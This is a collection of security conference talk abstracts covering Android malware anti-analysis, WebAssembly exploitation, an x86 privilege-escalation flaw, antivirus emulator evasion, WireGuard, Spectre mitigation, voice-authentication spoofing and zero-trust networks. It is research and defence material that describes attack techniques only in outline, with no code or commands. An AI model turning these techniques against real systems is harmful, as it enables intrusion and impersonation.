I will discuss each of the techniques the malware author used in order to prevent reverse engineering of their Android native library including manipulating the Java Native Interface, encryption, run-time environment checks, and more. This talk discusses not only the techniques the malware author implemented to prevent analysis, but also the steps and process for a reverse engineer to proceed through the anti-analysis traps. This talk will give you the tools to expose what Android malware authors are trying to hide.
WebAssembly (WASM) is a new technology being developed by the major browser vendors through the W3C. A direct descendent of NaCl and Asm.js, the idea is to allow web developers to run native (e.g. C/C++) code in a web page at near-native performance. WASM is already widely supported in the latest versions of all major browsers, and new use case examples are constantly popping up in the wild. Notable examples include 3D model rendering, interface design, visual data processing, and video games. Beyond providing significant performance benefits to developers, WebAssembly is also touted as being exceptionally secure. Developers claim that buffer overflows will be an impossibility, as any attempted access to out-of-bounds memory will be caught by a Javascript error. Their documentation claims that control flow integrity is enforced implicitly and that "common mitigations such as data execution prevention (DEP) and stack smashing protection (SSP) are not needed by WebAssembly programs." However, the documentation also outlines several possible vectors of attacks, including race conditions, code reuse attacks, and side channel attacks.
The goal of this talk is to provide a basic introduction to WebAssembly and examine the actual security risks that a developer may take on by using it. We will cover the low-level semantics of WebAssembly, including the Javascript API, the linear memory model, and the use of tables as function pointers. We will cover several examples demonstrating the theoretical security implications of WASM, such as linear memory being shared between modules and the passing of a Javascript 'Number' to a WASM function that expects a signed integer. We will also cover Emscripten, which is currently the most popular WebAssembly compiler toolchain. Our assessment of Emscripten will include its implementation of compiler-and-linker-level exploit mitigations as well as the internal hardening of its libc implementation, and how it's augmentation of WASM introduces new attack vectors and methods of exploitation. As part of this we will also provide practical examples of memory corruption exploits in the WASM environment that may lead to hijacking control flow or even executing arbitrary JavaScript within the context of the web page. Finally, we will provide a basic outline of best practices and security considerations for developers wishing to integrate WebAssembly into their product.
There exists a "feature" in the x86 architecture that, due to improper programming by many operating system vendors, can be exploited to achieve local privilege escalation. At the time of discovery, this issue was present on the latest-and-greatest versions of Microsoft Windows, Apple's macOS, and certain distributions of Linux. This issue, very likely, impacts other operating systems on the x86 architecture.
For both Intel and AMD CPUs, this vulnerability can be utilized to reliably and successfully exploit Windows 10 by replacing the access token of the current process with the SYSTEM token from an unprivileged and sandboxed usermode application. This results in local privilege escalation. On AMD hardware, if SMAP/SMEP is disabled, this vulnerability can be exploited without failure since arbitrary user-specified memory can be utilized in CPL 0.
Windows Defender's mpengine.dll implements the core of Defender antivirus' functionality in an enormous ~11 MB, 45,000+ function DLL.
In this presentation, we'll look at Defender's emulator for analysis of potentially malicious Windows PE binaries on the endpoint. To the best of my knowledge, there has never been a conference talk or publication on reverse engineering the internals of any antivirus binary emulator before.
I'll cover a range of topics including emulator internals (bytecode to intermediate language lifting and execution; memory management; Windows API emulation; NT kernel emulation; file system and registry emulation; integration with Defender's antivirus features; the virtual environment; etc.), how I built custom tooling to assist in reverse engineering and attacking the emulator; tricks that malicious binaries can use to evade or subvert analysis; and attack surface within the emulator. I'll share code that I used to instrument Defender and IDA scripts that can be helpful in reverse engineering it.
The state of VPN protocols is not pretty, with popular options, such as IPsec and OpenVPN, being overwhelmingly complex, with large attack surfaces, using mostly cryptographic designs from the 90s. WireGuard presents a new abuse-resistant and high-performance alternative based on modern cryptography with a focus on implementation and usability simplicity. It uses a 1-RTT handshake, based on NoiseIK, to provide perfect forward secrecy, identify hiding, and resistance to key-compromise impersonation attacks, among other important security properties, as well as high performance transport using ChaCha20Poly1305. A novel IP-binding cookie MAC mechanism is used to prevent against several forms of common denial-of-service attacks, both against the client and server, improving greatly on those of DTLS and IKEv2. Key distribution is handled out-of-band with extremely short Curve25519 points, which can be passed around in the likes of OpenSSH. Discarding the academic layering perfection of IPsec, WireGuard introduces the idea of a "cryptokey routing table", alongside an extremely simple and fully defined timer-state mechanism, to allow for easy and minimal configuration; WireGuard is actually securely deployable in practical settings. In order to rival the performance of IPsec, WireGuard is implemented inside the Linux kernel, but unlike IPsec, it is implemented in less than 4,000 lines of code, making the implementation manageably auditable.
2018 started off with a bang as the world was introduced to a new class of hardware vulnerability which became known as Meltdown and Spectre. New classes of vulnerabilities are exceedingly rare and this one came with ramifications for the security boundaries that web browsers, operating systems, and cloud providers rely on for isolation to protect customer data. Now, rewind back to the summer of 2017. This disclosure and the industry response were months in the making. A new class of vulnerability comes with challenges rarely mounted and the need to pull back to examine our thinking.
In this presentation, we will describe Microsoft's approach to researching and mitigating speculative execution side channel vulnerabilities. This approach involved bringing experts from across Microsoft, hiring an industry expert to accelerate our understanding of the issues, and collaborating across the industry in a way not done previously. This team presentation between Microsoft and G DATA will provide a firsthand account of the engineering centric work done and the collaboration necessary to mitigate these issues. We will describe the taxonomy and framework we created which provided the industry foundation for reasoning about this new vulnerability class. This work built on the initial researcher reports and expanded into a larger understanding of the issues. Using this foundation, we will describe the mitigations that Microsoft developed and the impact they have on Spectre and Meltdown.
Financial institutions, home automation products, and hi-tech offices have increasingly used voice fingerprinting as a method for authentication. Recent advances in machine learning have shown that text-to-speech systems can generate synthetic, high-quality audio of subjects using audio recordings of their speech. Are current techniques for audio generation enough to spoof voice authentication algorithms? We demonstrate, using freely available machine learning models and limited budget, that standard speaker recognition and voice authentication systems are indeed fooled by targeted text-to-speech attacks. We further show a method which reduces data required to perform such an attack, demonstrating that more people are at risk for voice impersonation than previously thought.
Over the last year, the "zero trust" network (ZTN) security architecture concept has generated interest both for its abstract security properties, and the marketing hoopla proclaiming it the "next big thing." The value proposition of "zero trust" networking is that it can more effectively prevent common security issues that lead to breaches while simultaneously enabling BYOD and removing the need for VPNs and legacy security concepts. ZTN architectures claim to enable both enhanced security and user freedom by removing implied trust from the network perimeter and replacing it measured trust at the user and device layers. This success of this scheme relies heavily on the ability to measure user and device security properties as a viable means to establish trust.
In this talk, we will analyze the "zero trust" approach in several threat scenarios to determine its true effectiveness. This will include an examination of the platform and device security properties that can be measured to establish trust across modern OSs such as Windows, Chrome OS, iOS, and Android. This will incorporate a detailed technical dive into the capabilities and limitations of device trust measurement frameworks such as Google's SafetyNet/Verified Access, Microsoft's System Guard Runtime, and common EDR/AV products. ZTN based methods for combining device and identity-based to provide access and authorization will also be examined.
Finally, public ZTN implementations will compared to a wide range of threats from common REDTEAM tradecraft all the way though hardware and firmware attacks. Attendees will walk away from the talk with a technically sound view on the potential and pitfalls of ZTN based networks, which will help to cut through the marketing hype.